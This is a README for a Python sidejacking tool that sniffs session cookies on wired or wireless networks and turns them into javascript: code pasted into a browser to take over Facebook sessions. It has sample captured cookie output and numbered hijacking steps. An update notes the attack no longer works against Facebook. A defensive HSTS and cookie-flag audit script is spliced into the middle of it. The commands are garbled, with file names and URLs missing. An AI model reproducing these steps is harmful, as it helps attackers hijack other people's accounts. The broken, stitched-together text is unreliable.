A simple sidejacking tool using JavaScript cookie injection.

This software sniffs any interface for cookies, and generates javascript code that can be injected into any browser, by pasting it into the URL bar.

It comes accompanied by a script:, that is able to use the airport sniff feature present in OS X 10.6+, allowing the wireless device to be put in monitor mode. We are, thus, able to retrieve any cookie sent on the chosen wireless channel.


To run the cookieJsInjection open a shell (e.g., bash) and execute the following command (cookieJsInjection requires scapy to run -


Where IFACE represents the network interface you wish to sniff on (e.g. eth0, wlan0, etc).

If you supply the flag -facebook, it will only output Facebook cookies, keeping track of the profiles captured in the session and eliminating duplicate entries:

./ IFACE -facebook

If you wish to run cookieJsInjection on a wireless device, and you are currently running OS X 10.6+, use

hybrid:py-cookieJsInjection diogomonica$ sudo python 9 -facebook
[*] Starting scan on channel 9
Capturing 802.11 frames on en1.
# Found cookie for facebook user XXXXXXXX:
c_user = XXXXXXXXX
presence = DJ294237494BchADhA_2256.channel_22BsubA_5b1_5dBF294237772227WMblcMshfPBbloMbvtMctP294232437BsbPBtA_5b_5dBfAnullBuctMsA0QBblADacA69V294236729Z292BlcPBuoAD1454092337ADolA-1BflA_5b_5dBexpP294237495196QB1259338588ADolA-1BflA_5b_5dBexpZ295237551044QQBalAD1606900057ADiA0QQQQ
xs = 24e156ef2ddf6d6911422b0a9825825f
datr = 4VToPPIw60lKSa3qrFSFrlm1
lu = ZBj64Z92UpiasQNnWbkzW32w
sct = 1273830123
x-referer =
[*] Javascript Injection code:

Remember to select the appropriate channel (in the example above, channel 9 was used).

Example of Facebook sidejacking

UPDATE: This tool no longer works to sniff Facebook cookies, since Facebook now uses TLS for all of its traffic and HSTS headers to prevent SSLStrip attacks.
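The update above names the two defenses, TLS for all traffic and HSTS. The following added example (not part of cookieJsInjection or the original README) audits a site's response headers for the gaps that would still leave cookies readable by a sniffer. The sample headers, the 180-day threshold and the function names are assumptions made for illustration.

```python
from http.cookies import SimpleCookie

# Constructed response headers for illustration (not captured traffic).
SAMPLE_HEADERS = [
    ("Strict-Transport-Security", "max-age=31536000"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
    ("Set-Cookie", "prefs=dark; Domain=example.test; Path=/"),
]

MIN_HSTS_MAX_AGE = 15552000  # assumed policy threshold: 180 days


def parse_hsts(value):
    """Return (max_age, include_subdomains) from an HSTS header value."""
    max_age, include_sub = 0, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        if name.lower() == "max-age" and arg.strip('"').isdigit():
            max_age = int(arg.strip('"'))
        elif name.lower() == "includesubdomains":
            include_sub = True
    return max_age, include_sub


def audit_headers(headers):
    """Return (subject, problem) findings that leave cookies exposed to a sniffer."""
    findings = []
    hsts = [v for k, v in headers if k.lower() == "strict-transport-security"]
    max_age, include_sub = parse_hsts(hsts[0]) if hsts else (0, False)
    if not hsts:
        findings.append(("hsts", "header missing"))
    elif max_age < MIN_HSTS_MAX_AGE:
        findings.append(("hsts", "max-age too short"))
    for key, value in headers:
        if key.lower() != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)
        for name, morsel in jar.items():
            if not morsel["secure"]:
                # Without Secure the browser also sends it over plain HTTP.
                findings.append((name, "no Secure flag"))
            if morsel["domain"] and hsts and not include_sub:
                findings.append((name, "domain-wide cookie, HSTS lacks includeSubDomains"))
    return findings


if __name__ == "__main__":
    for subject, problem in audit_headers(SAMPLE_HEADERS):
        print(f"{subject}: {problem}")
```
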

1 - Run cookieJsInjection and wait for cookies to appear

glow:py-cookieJsInjection hiperion$ sudo python en1 -facebook

2 - Copy the javascript code (beginning with javascript:).

3 - Open the browser in (make sure you are logged out of any accounts).

4 - Paste the javascript code into the URL bar (press enter)

5 - Go to


More information on sidejacking -


A python script that sniffs cookies from the network, and outputs Javascript code that can be used to inject the cookies into any browser.


